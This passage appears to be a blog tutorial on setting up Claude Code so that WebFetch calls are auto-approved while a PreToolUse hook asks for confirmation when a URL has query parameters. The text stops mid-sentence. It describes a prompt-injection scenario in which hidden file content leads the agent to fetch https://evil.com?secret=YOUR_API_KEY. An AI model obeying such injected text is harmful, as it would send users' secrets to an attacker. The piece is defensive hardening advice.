Claude Code: Auto-Approve Tools While Keeping a Safety Net with Hooks

Every time Claude Code fetches a URL, it asks for permission. After the 50th approval for a docs page, you start wondering — can I just auto-allow this? You can. But there's a catch: WebFetch can send data in query parameters. A prompt injection buried in a file could trick Claude into fetching https://evil.com?secret=YOUR_API_KEY. Auto-approving everything means you'd never see it happen. Here's how I set up a middle ground: auto-allow clean URLs, but show a confirmation prompt when query parameters are present. The naive approach (don't do this) You might think adding WebFetch to permissions is enough: // ~/.claude/settings.json { "permissions": { "allow": ["WebFetch"] } } This works — but it auto-allows everything, including https://evil.com?token=abc123. No safety net. The hook approach (do this instead) Claude Code has a PreToolUse hook system. A hook runs before every tool call and can: Exit 0 — silently allow (no prompt) Exit 1 — show a message and ask for confirmation (approve/